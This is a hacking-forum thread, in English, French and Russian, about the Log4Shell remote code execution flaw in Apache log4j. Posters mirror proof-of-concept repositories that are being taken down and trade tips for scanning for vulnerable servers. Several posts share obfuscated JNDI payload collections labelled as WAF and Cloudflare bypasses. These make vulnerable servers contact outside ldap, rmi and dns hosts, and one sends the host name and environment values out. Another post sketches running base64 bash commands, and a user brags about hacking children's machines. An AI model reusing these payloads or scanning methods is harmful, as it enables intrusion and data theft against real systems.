Remote CVE-2021-44228 Apache log4j RCE

[Lipshitz]

I started seeing posts about Minecraft servers vulnerable to rce but as time went on it was revealed that many versions of Apache are affected. This is similar to the bug that produced the Equifax 2017 data breach.

Also, there are many poc available on GitHub for those interested in playing around.

 

[Kelegen]

GitHub - YfryTchsGD/Log4jAttackSurface

Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.

github.com

 

[no1]

Im dropping zip file with a git clone from https://github.com/xiajun325/apache-log4j-rce-poc wich is a fork from https://github.com/udoless/apache-log4j-rce-poc
Because they are getting deleted by github currently, so dropping it here just in case it's down when you'ill want to download.

 

[Kelegen]

Im dropping zip file with a git clone from https://github.com/xiajun325/apache-log4j-rce-poc wich is a fork from https://github.com/udoless/apache-log4j-rce-poc
Because they are getting deleted by github currently, so dropping it here just in case it's down when you'ill want to download.

GitHub - tangxiaofeng7/apache-log4j-poc: Apache Log4j 远程代码执行

Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/apache-log4j-poc development by creating an account on GitHub.

github.com

 

[no1]

https://github.com/tangxiaofeng7/apache-log4j-poc

J'ai posté le fichier zip git clone juste au cas où le dépôt serait supprimé parce que c'est arrivé il y a quelques heures.

 

[Lipshitz]

Nice. Thanks guys

 

[garrett]

бедные дети играющие в майнкрафт на джаве

 

[Lipshitz]

Has anybody checked to see how many vulnerable instances are out there?

Any tips for scanning? Or search parameters to use

 

[DanteXDark]

Has anybody checked to see how many vulnerable instances are out there?

Any tips for scanning? Or search parameters to use

i used shodan, directly searching log4j in the search bar and i got 2 Chinese servers only ;(,
Edit:- ok found something fking interesting check this out https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22

 

[nullify]

i used shodan, directly searching log4j in the search bar and i got 2 Chinese servers only ;(,
Edit:- ok found something fking interesting check this out https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22

Фильтры существуют, будьте осторожны или заканчивают на сером шуме

 

[tENTENTe]

this is insane vul...
log4j is one of the essentials.

 

[Lipshitz]

Just saw this in another forum so I put here if anybody needs log4j Cloudflare bypass :
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

 

[garrett]

Я повзламывал амерских детей, и.. почему у них так много порносайтов в куки

 

[bbi34yy]

Так это затрагивает не только майнкрафт, к счастью.

Этот эксплоит позволяет выполнять подключение к произвольному ldap серверу, адрес которого записан в формате jndi: … А если в адрес сервера записать в base64 команду на bash, например, то при сохранении строки в лог эта команда будет выполнена от имени пользователя, от которого запущен сервис.

Ну и CF уже паникует:
blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/

 

[opapopa1090]

Я повзламывал амерских детей, и.. почему у них так много порносайтов в куки

интересно

 

[Братик]

Хотел бы затестить, но у меня нет сервака и битков)

 

[weaver]

Collection of WAF evasion payloads

${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}

 

[UnknownDeath]

So could someone explain to me what's this vuld about? I Know it's critical and super bad to most people running Apache2 but what does it even do? Anyone have a PoC Video Yet?

 

[Lipshitz]

So could someone explain to me what's this vuld about? I Know it's critical and super bad to most people running Apache2 but what does it even do? Anyone have a PoC Video Yet?

I think this article should explain it for u https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

 

[Lipshitz]

Collection of WAF evasion payloads

Found bypass for a few more WAF

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}